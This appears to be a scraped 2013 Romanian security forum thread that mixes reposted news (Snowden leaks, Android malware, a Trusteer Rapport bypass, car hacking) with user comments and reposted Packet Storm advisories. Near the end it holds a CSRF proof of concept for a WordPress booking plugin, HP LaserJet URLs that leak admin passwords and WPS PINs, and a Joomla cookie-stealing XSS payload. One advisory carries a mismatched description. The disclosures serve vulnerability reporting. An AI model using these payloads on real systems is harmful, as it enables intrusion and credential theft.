Matt

BRASÍLIA - Brazil-based American reporter Glenn Greenwald said Tuesday that he had received more than 15,000 secret US government documents from intelligence leaker Edward Snowden. Greenwald, who revealed details of Washington's vast electronic surveillance program in Britain's Guardian newspaper, gave no details of the content of the files as he testified before the Brazilian Senate´s foreign relations committee. "I did not do an exact count, but he gave me 15,000, 20,000 documents. Very, very complete and very long," Greenwald said, responding to questions from lawmakers. "The stories we have published are a small portion. There will certainly be more revelations on the espionage activities of the US government and allied governments (...) on how they have penetrated the communications systems of Brazil and Latin America," he said. He added that he could not give more details on the documents because an investigation of Snowden is under way in the United States. "The pretext (given by Washington) for the spying is only one thing: terrorism and the need to protect the (American) people. But the reality is that there are many documents which have nothing to do with terrorism or national security, but have to do with competition with other countries, in the business, industrial and economic fields," Greenwald said. Referring to the XKeyscore secret surveillance system allegedly used by NSA to monitor Internet traffic, he said Washington was collecting not just metadata, "but also the content of emails and what is being discussed in telephone conversations. It is a powerful program which frightens." In an interview with AFP last month, Greenwald explained that Snowden personally handed him the documents in Hong Kong, where the former NSA contractor temporarily took refuge, after fleeing the United States. The Brazilian O Globo magazine carried stories alleging that Washington maintained a spy center in Brasilia which was part of a network of 16 such facilities around the world to intercept foreign satellite transmissions. Last month, US Vice President Joe Biden called Brazilian President Dilma Rousseff to provide a explanation following press reports of US electronic surveillance in Brazil based on leaks from Snowden, a former US National Security Agency contractor. Snowden is now a fugitive from US justice and is currently living at an unknown location in Russia after Moscow granted him temporary asylum for a year on August 1. Sursa SecurityWeek.com

Asta ne paste baieti !

Sistemul de operare mobila Google Anroid este coplesit de catre infractorii cibernetici care creaza aplicatii malware, astfel incat numarul programelor malware va atinge pragul de un milion pana la sfarsitul anului 2013, avertizeaza Trend Micro. Aceste informatii se regasesc in raportul Security Roundup al companiei, aferent celui de-al doilea trimestru al anuilui, care releva ca numarul aplicatiilor Android rau intentionate a crescut cu 350.000 in prima jumatate a anului 2013, atingand numarul de 718.000 pana in luna iunie a acestui an. Trend Micro a declarat ca acest lucru de datoreaza hackerilor care doresc sa exploateze baza globala de utilizatori Android, aflata in cresteree. "Ecosistemul deschis Android continua sa fie exploatat de catre infractorii cibernetici, numarul aplicatiilor malware crescand de la 509.000 in primul trimestru al anului si urmand sa atina pragul de un milion pana la sfarsitul anului 2013", a informat raportul Trend Micro, adaugand ca majoritatea aplicatiilor malware sunt ambalate pentru a arata precum aplicatiile smartphone populare. "Malware-ul a fost gasit chiar si in magazinul oficial Google Play, facand din software-ul de securitate un instrument esential pentru a preveni descarcarile de aplicatii malware". Cele mai comune aplicatii malware au totalizat 44% din numarul total al aplicatiilor identificate si functionau prin abonarea utilizatorilor ori utilizarea serviciilor fara stirea acestora, trimitand mesaje text catre numere cu tarif special, dezvoltatorul malware beneficiind de profitul astfel obtinut. Cu 24%, a doua cea mai comuna categorie de aplicatii malware sunt cele care fura date, urmae de adware si aplicatii care descarca continut rau. Acest tip de malware este in crestere datorita naturii fragmentate a bazei de utilizatori Android. Deoarece este dificil ca patch-urile sa ajunga la toti utilizatori intr-un interval de timp eficient, unii dintre utilizatori nu vor avea parte niciodata de aceste patch-uri, intrucat furnizorii isi lasa clientii sa suporte riscurile unor atacuri, sustine raportul. Compania de securitate a remarcat ca aceasta amenintare va continua sa creasca rapid, pana cand furnizorii smartphone vor constientiza nevoia urgenta de a proteja utilizatorii in aceeasi maniera in care furnizorii PC o fac. Numarul tot mai mare al toolkit-urilor malware puse la dispozitie pe piata neagra in mod gratuit sau doua la pretul unuia ori alte oferte, a fost, de asemenea, observat in cuprinsul raportului. Trend Micro recomanda ca terte programe software de securitate sunt esentiale pentru a preveni descarcarile malware. Sursa : THE INQUIRER - News, reviews and opinion for tech buffs

Peste jumatate dintre companii declara critic sau foarte important accesul rapid la date si informatii Potrivit unui sondaj realizat de SAP AG (NYSE: SAP), liderul mondial pe piata de solutii software de business, 20% dintre companiile private de la nivel global intentioneaza sa implementeze tehnologii in-memory in urmatorul an, pentru accesul in timp real la date si informatii, in vreme ce peste 10% dintre acestea sunt in plin proces de implementare a noilor tehnologii de baze de date. in plus, aproximativ o treime dintre companiile respondente intentioneaza sa implementeze astfel de tehnologii in urmatorii doi sau trei ani. „Adoptia tehnologiei in-memory este o tendinta tot mai vizibila pe pietele occidentale, deoarece tot mai multi manageri s-au convins de beneficiile acestor tehnologii, care asigura procesarea unor cantitati masive de date intr-un timp foarte scurt comparativ cu bazele de date traditionale. Astfel, organizatiile din orice industrie pot gestiona toate procesele operationale critice in timp real, ceea ce inseamna ca aceste companii devin un reper si pentru alte firme din alte piete, precum si cea locala”, a apreciat Valentin Tomsa, directorul general al SAP Romania. Peste 50% dintre companiile respondente considera accesul rapid la informatii ca fiind critic sau foarte important pentru bunastarea organizatiei, si doar sub 5% dintre acestea nu acorda importanta accesarii rapide de date. Referitor la avantajele tehnologiilor in-memory, mai mult de jumatate dintre companii au apreciat capacitatea de raportare in timp real a informatiilor operationale ca fiind cel mai mare beneficiu, urmatoarele avantaje identificate fiind accelerarea vitezei stocarii si prelucrarii datelor si imbunatatirea capacitatii de planificare si previzionare. De asemenea, posibilitatea realizarii de analize predictive si intocmirea rapoartelor intr-un timp extrem de scurt au fost apreciate de circa 20% dintre companiile respondente. Platforma de in-memory computing a SAP, cel mai dinamic produs din portofoliul companiei Platforma in-memory SAP HANA are cea mai rapida crestere din portofoliul SAP si numara mai mult de 1.500 de clienti in prezent, solutia fiind implementata in toate cele 25 de verticale de business ale SAP, inclusiv in sport, retail si sanatate, acolo unde noile oportunitati si modele de business sunt inca in curs de dezvoltare. Adoptarea intr-o gama larga de domenii este un semn clar al maturitatii si nivelului crescut de aplicabilitate al platformei SAP HANA. In plus, prin intermediul pachetului de solutii SAP Business Suite, lansat de curand pe HANA, organizatiile pot gestiona toate procesele critice de business in timp real, cum ar fi planificarea si executia bugetara, raportarea sau analiza datelor financiare, pentru a utiliza informatiile cele mai relevante in strategia de dezvoltare a companiei. Companiile isi pot accelera semnificativ activitatea si se pot dezvolta urmand scenarii de business generate in timp real. De asemenea, SAP a dezvoltat un pachet de servicii suport, precum si o solutie pentru implementare rapida, care permite tuturor clientilor existenti sa migreze cu propria baza de date pe platforma SAP HANA, fara intrerupere si intr-un timp foarte scurt. Despre SAP Ca lider de piata pe segmentul solutiilor software pentru afaceri, SAP (NYSE: SAP) ajuta companiile de orice dimensiune si din orice tip de industrie sa-si gestioneze afacerile mai bine. De la back office la consiliul director, din depozite pana la punctele de desfacere, din computer pana la instrumentele mobile de comunicare – SAP transfera oamenilor si organizatiilor increderea si puterea necesare pentru a lucra impreuna eficient si pentru a folosi eficace resursele interne ale afacerii, astfel incat sa fie cu un pas inaintea competitorilor. Aplicatiile si serviciile SAP ajuta peste 238.000 de clienti sa gestioneze profitabil operatiunile si resursele, sa se adapteze continuu si sa creasca sustenabil. Pentru mai multe informatii vizitati www.sap.com Sursa : www.totalpr.ro

Pedeapsa maxima pe care risca sa o primeasca Bradley Manning, "cartita" WikiLeaks, a fost redusa de la 136 la 90 de ani dupa decizia judecatorului de a asimila anumite pedepse, a anuntat marti armata americana, preluata de agentiile internationale de presa. Soldatul in varsta de 25 de ani a fost gasit vinovat la 30 iulie de 20 din cele 22 de capete de acuzare ce il vizeaza - mai ales cinci incalcari ale legislatiei privind spionajul - dar a fost achitat de cea mai grava acuzatie, cea legata de conspiratie cu inamicul. In cadrul unei audieri desfasurate marti pentru a-i stabili pedeapsa, judecatoarea Denise Lind a considerat ca "anumite acuzatii se repeta in ceea ce priveste sentinta" si a dispus dizolvarea acestora, a afirmat, intr-un comunicat, US Army, fara a preciza despre ce capete de acuzare este vorba. Bradley Manning, care a recunoscut ca a transmis circa 700.000 de documente diplomatice si militare site-ului de internet WikiLeaks, risca drept urmare un total de 90 de ani de inchisoare pentru acuzatii de spionaj, de frauda informatica, de furt de informatii de la guvernul american si de insubordonare in armata. El a pledat vinovat pentru zece dintre aceste capete de acuzare pentru un total de 20 de ani de inchisoare. Procesul, care a inceput in prima parte a lunii iunie la baza Fort Meade, la nord de Washington, este prevazut sa dureze pana la 23 august si va continua in aceasta saptamana cu audierea unor martori de catre acuzare si aparare pentru a definitiva durata pedepsei sale, noteaza AFP. Sursa Business24.Ro

Geek comedian Tom Scott imagines citizen volunteers accessing the real-time data store of spy agencies to help keep the country safe. Imagine that the NSA and the U.K.'s GCHQ opened their databases and tools to public volunteers to aid them in the search for terrorists. Tom Scott, who is described as a British geek comedian, programmer, and presenter, produced a video, "Oversight: Thank you for volunteering, citizen," that imagines ordinary citizens accessing the databases of everything about everyone to assist governments in their surveillance activities. Scott's "Oversight" program lets ordinary citizens click on potential threats as they are logged, such as an e-mail with the words "blowing things up" in it; view the information; and add information to spy agency databases. "Is it a jokey e-mail between friends? Or a serious incident worth reporting to the police," the presenter asks. "You now have the tools to find out. You can read the subject lines of e-mails, the Web sites they visited, information from social networks, location history, credit card purchases, and information about friends and family." If that's not enough information, Oversight lets citizen volunteers click to apply for a search warrant, which is normally granted in 15 to 30 seconds. It's a bit beyond the Department of Homeland Security's "If you see something, say something" campaign. http://asset0.cbsistatic.com/cnwk.1d/i/tim2/2013/08/06/Screen_Shot_2013-08-06_at_4.15.32_PM_610x241.png Scott told CNET that the video has been well received, but a lot of people find it unsettling. "There have been a few replies from people who said they'd sign up as a volunteer right away. One or two have even said that they'd actually be in favor of setting up Oversight. Provided, of course, that there were 'safeguards' in place," he said. Like pentru elefant. Sursa News.Cnet.Com

With incentives, the government aims to entice power utilities, water infrastructure, and transportation networks to sign onto its upcoming Cybersecurity Framework. With the goal of avoiding a massive cyberattack on U.S. infrastructure, the White House has proposed a handful of incentives to get power plants, water companies, and transportation networks to join a national cybersecurity program. "The systems that run our nation's critical infrastructure such as the electric grid, our drinking water, our trains, and other transportation are increasingly networked," the White House wrote in a blog post Tuesday. "As with any networked system, these systems are potentially vulnerable to a wide range of threats, and protecting this critical infrastructure from cyber threats is among our highest security priorities." Chaired by the Department of Homeland Security, the program incentives offered to companies include cybersecurity insurance, priority consideration for grants, and streamlined regulations. To get these incentives, the critical infrastructure companies must agree to adopt certain tech practices within the government's upcoming Cybersecurity Framework. These proposed incentives are a preliminary step for the government's cybersecurity policy and have not yet been finalized. The White House has been working to tighten up the country's cybersecurity over the past couple of years. In February, President Barack Obama signed an executive order that he said will "strengthen our cyber defenses by increasing information sharing, and developing standards to protect our national security, our jobs, and our privacy." The president also signed an executive order in July 2012 which detailed emergency Internet control. This order was designed to empower certain governmental agencies with control over telecommunications and the Web during natural disasters and security emergencies. It's probably a wise decision for the government to have cybersecurity on the front burner. Weeks after the head of Homeland Security, Janet Napolitano, announced that she believed a "cyber 9/11" could happen "imminently" -- crippling the country's power grid, water infrastructure, and transportation networks -- hackers hit the U.S. Department of Energy. While no data was compromised in this attack, it did show that hackers were able to breach the government's computer system. In May, Congress released a report that claimed power utilities in the U.S. are under "daily" cyberattacks. Of about 160 utilities surveyed in the report, more than a dozen reported "daily," "constant," or "frequent" attempted cyberattacks on their computer systems. While the data in the report sounded alarming, none of the utilities reported any damage to their facilities or actual breaches of their systems -- but rather attempts to hack their networks. The proposed incentives are a part of the White House's Cybersecurity Framework, which should be complete by October. A final framework is scheduled to be released in February. Critical infrastructure companies will be encouraged to sign onto this framework. Sursa TheRegister.co.uk

Barely two months after rolling out two-factor authentication, Twitter has beefed up its login procedures yet again, both to improve security and to make two-factor available to more Twitter users worldwide. Twitter launched two-factor authentication in late May with a system based on SMS messaging. While that was good enough for many users, however, it did present some problems. For one thing, verification via SMS is only available via supported mobile carriers, which isn't all of them. For another, using SMS as a security mechanism relies on the SMS delivery channel being secure, and some carriers' text messaging systems might not be. On Tuesday, Twitter rolled out an update to its two-factor authentication scheme that can optionally make use of the Twitter mobile app for Android and iOS, rather than SMS. "Simply tap a button on your phone, and you're good to go," Twitter security engineer Alex Smolen wrote in a blog post. "This means you don't have to wait for a text message and then type in the code each time you sign in on twitter.com." The app approach offers other advantages, as well. Because it's based on public-key cryptography, it's inherently more secure than the SMS approach. The mobile app generates a public/private key pair and Twitter only stores the public key, while the private key never leaves the user's phone. As a result, an attacker won't be able to fake a login even if Twitter's authentication server is compromised. When the app receives a login verification request, it will also tell you details about the browser that is being used to make the login attempt, including its approximate location – so if you see any suspicious logins from Iran, you'll know not to approve them. The app also generates a "backup code" during the setup process, which it advises you to write down and keep in a safe place. In the event you ever lose your phone, you can use the backup code to login to Twitter, un-enroll your old phone from login verification, and enroll your new one. As before, login verification is optional and can be enabled from any Twitter account's Settings panel. To take advantage of the new, app-based authentication process, you'll need to update to version 5.9 of the Twitter app for iOS or version 4.1.4 of Twitter for Android, both of which shipped on Tuesday. ® Sursa TheRegister.co.uk

Trusteer has dismissed reports that criminals are exploiting a vulnerability in its Rapport browser-lockdown technology that is used by leading banks such as HSBC and NatWest. Trusteer chief executive officer Mickey Boodaei told V3 that recent reports of an exploitable vulnerability in its Rapport banking service are inaccurate as it does not work, confirming the company is aware of the issue and has already taken appropriate action. "There is no malware that incorporates this vulnerability. Moreover, Trusteer has accurate intelligence on the fraudsters who wrote, sold, and published this code, which we shared with law enforcement agencies," he said. "This is just one out of many attempts to circumvent Rapport, which we fight on an ongoing basis. This time with great success as the group that wrote this code is most likely responsible for various fraudulent activities against UK banks." Trusteer's Rapport technology is used by numerous financial firms, including NatWest and HSBC in the UK, and is designed to protect the banks' customers against Trojans, like the infamous Zeus. The vulnerability was first reported on the Full Disclosure forum and reportedly lets crooks bypass the browser's lockdown security features to sneak a banking Trojan onto the victim's machine. Reports have since emerged about a number of cybercrime forums, suggesting that criminals are already exploiting the security vulnerability. However, Trusteer said this exploit does not work. Trusteer chief technology officer Amit Klein added that a patch fix is already available and is being automatically rolled out to all Rapport customers. "The patch for this vulnerability is available and is being rolled out automatically to the entire Trusteer Rapport customer base. No action is required from Rapport users," he said. "This vulnerability has no impact on Rapport's ability to block financial malware like Zeus, KINS, Carberp, Gozi, Tilon and Citadel as Rapport uses additional mechanisms, other than the mechanism impacted by this vulnerability, to block these malware strains. Furthermore, there is no financial malware to date that is trying to exploit this vulnerability." The financial industry is one of cyber criminals' most common targets. Most recently hackers hit the NASDAQ community forum with a password-stealing cyber raid. Sursa V3.co.uk

Renowned hackers Charlie Miller and Chris Valasek have released tools capable of hijacking control of moving cars to the general public. Miller and Valasek released the tools alongside a white paper explaining their research. The tools relate to the 2010 Toyota Prius and the 2010 Ford Escape and let hackers remotely take control of the cars' electronic smart steering, braking, acceleration, engines and lights. Miller and Valasek originally showed off the attack with a live demonstration at the Defcon hacker conference at the start of August. The paper shows the specific processes required to hack various different electronic components to enact specific commands. At the time of publishing Ford and Toyota had not responded to V3's request for comment on the research. Miller and Valasek said the research is designed to prove that smartcar manufacturers take an inadequate approach towards security. The white paper said: "When electronic networked components are added to any device, questions of the robustness and reliability of the code running on those devices can be raised. When physical safety is in question, as in the case of the automobile, code reliability is a more important and practical concern. "In typical computing environments, such as a desktop computer, it is possible to easily write scripts or applications to monitor and adjust the way the computer runs. Yet, in highly computerised automobiles, there is no easy way to write applications capable of monitoring or controlling the various embedded systems. Drivers and passengers are strictly at the mercy of the code running in their automobiles and, unlike when their web browser crashes or is compromised, the threat to their physical wellbeing is real." Miller and Valasek said they hope by releasing the tools other hackers will build on their work, helping create answers to modern cars' security issues. "Besides discussing new attacks, this paper aims to bring accessibility to automotive systems to security researchers in an open and transparent way. Currently, there is no easy way to write custom software to monitor and interact with the engine control units (ECUs) in modern automobiles. The fact that a risk of attack exists but there is not a way for researchers to monitor or interact with the system is distressing," read the white paper. "This paper is intended to provide a framework that will allow the construction of such tools for automotive systems and to demonstrate the use on two modern vehicles. This framework will allow researchers to demonstrate the threat to automotive systems in a concrete way as well as write monitoring and control applications to help alleviate this threat." Car security has been a growing area of interest within the research community. Prior to Miller and Valasek's release, Volkswagen won a high court ruling blocking University of Birmingham lecturer Flavio Garcia from releasing a similar research paper. Sursa V3.co.uk

Doamne, ce idiot.

Pompier zici, pai pregateste-te ca s-ar putea sa ai parte de ceva incendii pe aici.

Earlier this year we took a look at SSD caching, an alternative way of getting some SSD performance added to a system without too much strain put on the finances. So how about a gander at the other end of the spectrum – huge capacity and performance and a total disregard for the budget Enter the KingSpec Multicore MC1S81M2T, a 2TB PCI-Express SSD costing a mere three-and-a-half grand. KingSpec Multicore MC1S81M2T 2TB PCI-E SSD KingSpec may be a new name to a lot of people, but it has been producing flash-based drives since 2005. It is only recently that its products been available to buy in the UK, though. Available by special order only from UK distributors Quiet PC, the MC1S81M2T is KingSpec’s current flagship from the PCI-E SSD range – which also includes 1TB and 500GB versions for a good deal less. This SSD is a monster of a card with eight of the company's 240GB mSATA drives (each drive using 25nm MLC NAND) bolted on to a PCB and then built into a RAID 0 array to deliver its 2TB capacity. Each of the drives features a dedicated LSI SandForce SF2281 controller and the whole shooting match is controlled by a LSI SAS2008 SAS controller (6Gbps SAS/SATA, 8x PCI-E interface). So, to recap, that’s eight LSI SandForce controllers feeding a SAS controller going through an 8x PCI-E slot on the motherboard, all of which gives the MC1S81M2T some pretty astonishing headline speeds. Ignoring for a moment the quoted sustained read speed of 4GB/s, which is the theoretical read speed, the actual read speed achieved in tests is still pretty mind-blowing: a whopping 2.59GB/s (yes that’s GB/s not MB/s) reads and 2.36GB/s writes. 6Gb/s brickwall So why go down the PCI-Express bus route? Well, the figures speak for themselves. And yet for really large capacity coupled with high speed transfer rates, good old SATA interface doesn’t quite cut the mustard anymore. Hence, the attention turns to some other form of interface, namely the PCI-Express bus of the motherboard. The current crop of PCI-E based drives are an indication of where the future lies for the performance SSD. While the 6Gbit/s SATA interface – once the godsend for the performance SSD – is now its Achilles heel, as even mainstream drives can now almost flood the interface. The next generation of drives will almost certainly be based around SATA-Express. The specification is currently undergoing the SATA-IO (The Serial ATA International Organization) ratification process, with drives hopefully appearing in late 2013 early 2014. Using the PCI-E bus will allow drive interface speeds of up to 1GB/s per lane as opposed to the 0.6GB/s of the current SATA interface. Eventually the technology should see storage devices with up to 16Gb/s interfaces. Sursa TheRegister.co.uk

Pai tu ce faci? Ceri la toata lumea conturi de cs:go moca si apoi le vinzi sau faci schimb cu ele ? https://rstforums.com/forum/73384-cs-go.rst

Asta cu imposibil de spart.. nu stiu cum e pentru voi dar eu am invatat ceva in toti acesti ani.Parerea mea este ca nimic nu mai este de "nespart" . Eu cred ca pentru orice lucru securizat exista leac chiar daca noi nu stim si poate nu vom sti niciodata ca exista. Nimic nu mai este sigur. Nici macar toaletele.

Probabil atunci cand se va crea cardul sa fie permis un numar mai mare de scanari gen 2-3 persoane. Asa poate sa-ti goleasca si fratele cardul.

Nu am dat ordine nimanui si nici nu m-am atacat.Daca nu ma las calcat in picioare de tine si nu iti raspund cum vrei tu asta inseamna ca ma atac? Te intereseaza prea mult de mine, mai mult decat de tine.Te rog sa iti vezi de treaba.

Asta e viitorul.Deja incepe sa se "proiecteze" idei fanteziste, pe care inainte le vedeam doar in filme. Oricum este mult mai sigura recunoasterea faciala.. acum depinde si de evolutia celor care se ocupa cu black hat .

https://bugzilla.mozilla.org/show_bug.cgi?id=901365

Cybercrooks on an underground forum have developed a technique to bypass anti-Trojan technology from Trusteer used by financial institutions worldwide – including HSBC and Paypal – to protect depositors from cybersnoopers. Trusteer has downplayed the vulnerability and said it's in the process of rolling out beefed-up protection anyway. However, independent security researchers who first spotted the exploit warn that bank customers remain at risk. Trusteer's Rapport browser lock-down technology is offered as a voluntary download by 50 banks worldwide, including NatWest and HSBC in the UK. US customers include ING Direct USA; eBay and PayPal also offer it to their customers as protection against banking Trojans. An exploit on private cybercrime forums, spotted by digital forensics firm Group-IB, offers a means to bypass the browser lock-down technology. More precisely, Trusteer Rapport versions 1208.41 and below suffer from a memory modification vulnerability that turns off "Rapport's selfcheck unhooking and intercepting system" APIs. More technical details of the flaw can be found in a post over the weekend on a full disclosure mailing list here. "With the help of this new exploit it is possible to intercept users' credentials when Trusteer Rapport is active," explained Andrey Komarov, head of international projects at Group-IB. Members of the cybercrime forum have started to use the trick to bypass Rapport checking, which prevents the theft of users' credentials – including login details for online banking services - through interception, according to Komarov. In a statement Amit Klein, CTO at Trusteer. downplayed the seriousness of the flaw. Klein said the bug only affected one of the protection layers offered to customers by the software. The patch for this vulnerability is available and is being rolled out automatically to the entire Trusteer Rapport customer base. No action is required from Rapport users. This vulnerability has no impact on Rapport's ability to block financial malware like Zeus, KINS, Carberp, Gozi, Tilon and Citadel as Rapport uses additional mechanisms, other than the mechanism impacted by this vulnerability, to block these malware strains. Furthermore, there is no financial malware to date that is trying to exploit this vulnerability. An advisory along the same lines, a copy of which has been seen by El Reg, was sent to Trusteer's banking customers on Monday. This advisory adds the important caveat that "the combination of this vulnerability with a new (i.e. unknown, not currently seen in the wild) strain of malware, for which Rapport doesn’t apply multiple layers of protection, could result in a successful bypass of Rapport’s protection." The bypass is still in play, according to Komarov. "It is still unpatched, we can create a similar video on the actual [current] version of Rapport, where the bypass will be still working," he told El Reg. "Because of leakage of source codes of SpyEye and Carberp, there are already some recompiled copies which use this exploit to bypass its security." Komarov added that Group-IB is profiling teams of hackers who have already started to use this bug. Some of these hackers had previously released Anti-Rapport modules to SpyEye and ZeuS, the two most widely used banking Trojan tools abused by cybercriminals over recent years. Cybercrime forums have been active with discussions about possible mechanisms to bypass Trusteer since 2010, Komarov added. ® Sursa Theregister.co.uk

Nu e problema ta ce postez eu.Nu vorbi daca nu ma cunosti, cand am fost intrebat de tine, desi nu te cunosteam am vorbit ok. // Inteleg ca iti place sa vezi Feed plin de posturi la Off-Topic cum a fost tot weekend-ul , dar te rog sa eviti asemenea discutii.Iti place intri nu iti place nu intri si nu comentezi.

Description : Book Calendar WordPress plugin version 4.1.4 suffers from a cross site request forgery vulnerability. Author : Dylan Irzi Source : Booking Calendar 4.1.4 Cross Site Request Forgery ? Packet Storm Code : ########################################################################################### # Exploit Title: CSRF Plugin Booking Calendar 4.1.4 – WordPress # Date: 04 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://wpbookingcalendar.com/ # Tested on: Win8 & Linux Mint # Affected Version : 4.1.4 # # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} # Greetz: all team WebSecuritydev. ########################################################################################### CSRF VIA POST. Añadir nuevo. http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php POST: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ----------------------------------------------------------- ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi% 40gmail.com ~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES --------------------------------------------------------- --------------------------------------------------------- Delete: Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php Post: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions Content-Length: 104 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache --------------------------- ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES --------------------------------------------------------- --------------------------------------------------------- << Aprobar Evento >> URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php POST: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions Content-Length: 128 Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271; wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b; PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache --------------------------------------------------------- ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES --------------------------------------------------------- --------------------------------------------------------- -- *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad. WhiteHat. *

Description This is the malicious javascript for the Firefox 0-day created to target Tor users leveraging the .onion sneaker net. The shellcode is supposedly neutered but test at your own risk. Download : Download: TOR Firefox 0-day ? Packet Storm

Description : This is the malicious javascript for the Firefox 0-day created to target Tor users leveraging the .onion sneaker net. The shellcode is supposedly neutered but test at your own risk. Author : Michal Sajdak Source : HP LaserJet Credential Disclosure / Missing Authentication ? Packet Storm Code : Some of the networked HP LaserJet printers have hidden URLs hardcoded in the firmware. The URLs are not authenticated and can be used to extract admin password in plaintext – among other information like WiFi settings (including WPS PIN). Models affected: HP LaserJet Pro P1102w, HP LaserJet Pro P1606dn, HP LaserJet Pro CP1025nw, HP LaserJet Pro M1212nf MFP, HP LaserJet Pro M1213nf MFP, HP LaserJet Pro M1214nfh MFP, HP LaserJet Pro M1216nfh MFP, HP LaserJet Pro M1217nfw MFP, HP LaserJet Pro M1218nfs MFP, Possibly others(?) URLs details: Here are at least two interesting URLs, which can be accessed without authentication: http://IP_ADDRESS/dev/save_restore.xml (gives admin password/configuration parameters in plaintext) http://IP_ADDRESS:8080/IoMgmt/Adapters/wifi0/WPS/Pin (gives WPS PIN in plaintext) Original disclosure: http://sekurak.pl/hp-laserjet-pro-printers-remote-admin-password-extraction/ Original information from HP: https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%253Demr_na-c03825817-1%257CdocLocale%253D%257CcalledBy%253D&javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&ac.admitted=1375697666155.876444892.199480143 History 19.04.2013 vendor notified 19.04.2013 initial vendor response received 24.04.2013 issue confirmed 26.07.2013 new firmwares released 31.07.2013 issues summary published by vendor 02.08.2013 disclosure -- Michal Sajdak, Securitum

Description : Joomla versions 3.1.5 and below suffer from a reflective cross site scripting vulnerability in example.php. Author : Emilio Pinna Source : Joomla 3.1.5 Cross Site Scripting ? Packet Storm Code : ============================================================ - Original release date: August 05, 2013 - Discovered by: Emilio Pinna (Application Security Analyst at Abinsula) - Contact: (emilio (dot) pinn (at) gmail (dot) com) - Severity: 4.3/10 (Base CVSS Score) ============================================================ VULNERABILITY ------------------------- Joomla core package <= 3.1.5 includes a PHP script that suffers from reflected XSS vulnerability that allows to inject HTML and malicious scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Joomla is one of the most installed CMS with dozens of millions of installations. DESCRIPTION ------------------------- Affected file libraries/idna_convert/example.php has different injection points: - Unsanitized lang parameter in line 24 - Unsanitized file name printing on lines 112 and 119 PROOF OF CONCEPT ------------------------- http://localhost/joomla/libraries/idna_convert/example.php?lang="><script>alert(document.cookie);</script><!-- BUSINESS IMPACT ------------------------- As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session that visits the malicious crafted url. SYSTEMS AFFECTED ------------------------- Joomla-CMS <= 3.1.5 SOLUTION ------------------------- Fixed removing the vulnerable example file on git with commit c00c033d33d901e1ca6be9061a44e55acd041b1f REFERENCES ------------------------- http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/ https://github.com/joomla/joomla-cms/issues/1658 CREDITS ------------------------- Emilio Pinna (emilio (dot) pinn (at) gmail (dot) com) DISCLOSURE TIMELINE ------------------------- August 4, 2013: Opened a ticket describing the bug by Adam Willard. August 5, 2013: Fixed by Michael Babker. August 5, 2013: Vulnerability disclosed by Emilio Pinna. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.